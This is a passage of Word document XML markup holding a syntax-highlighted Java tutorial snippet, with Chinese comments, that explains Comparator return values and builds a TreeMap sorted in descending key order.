              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> compare(Object o1, Object o2) </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>返回一个基本类型的整型，</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A53EDB" w:rsidRPr="00117411" w:rsidRDefault="00A53EDB" w:rsidP="00A53EDB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">             * </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>返回负数表示：</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">o1 </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>小于</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>o2</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A53EDB" w:rsidRPr="00117411" w:rsidRDefault="00A53EDB" w:rsidP="00A53EDB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">             * </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>返回</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">0 </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>表示：</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>o1</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>o2</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>相等，</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A53EDB" w:rsidRPr="00117411" w:rsidRDefault="00A53EDB" w:rsidP="00A53EDB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">             * </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>返回正数表示：</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>o1</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>大于</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>o2</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A53EDB" w:rsidRPr="00117411" w:rsidRDefault="00A53EDB" w:rsidP="00A53EDB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">             */</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A53EDB" w:rsidRPr="00117411" w:rsidRDefault="00A53EDB" w:rsidP="00A53EDB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> compare(String </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>o1</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, String </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>o2</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">) {  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A53EDB" w:rsidRPr="00117411" w:rsidRDefault="00A53EDB" w:rsidP="00A53EDB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">              </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A53EDB" w:rsidRPr="00117411" w:rsidRDefault="00A53EDB" w:rsidP="00A53EDB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">                </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>//</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>指定排序器按照降序排列</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A53EDB" w:rsidRPr="00117411" w:rsidRDefault="00A53EDB" w:rsidP="00A53EDB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">                </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>o2</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.compareTo(</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>o1</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">);  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A53EDB" w:rsidRPr="00117411" w:rsidRDefault="00A53EDB" w:rsidP="00A53EDB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">            }     </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A53EDB" w:rsidRPr="00117411" w:rsidRDefault="00A53EDB" w:rsidP="00A53EDB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">        });  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A53EDB" w:rsidRPr="00117411" w:rsidRDefault="00A53EDB" w:rsidP="00A53EDB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>treeMap2</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.put(</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="2A00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"2"</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="2A00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"1"</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">);  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A53EDB" w:rsidRPr="00117411" w:rsidRDefault="00A53EDB" w:rsidP="00A53EDB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>treeMap2</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.put(</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="2A00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"b"</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="2A00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"1"</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">);  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A53EDB" w:rsidRPr="00117411" w:rsidRDefault="00A53EDB" w:rsidP="00A53EDB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
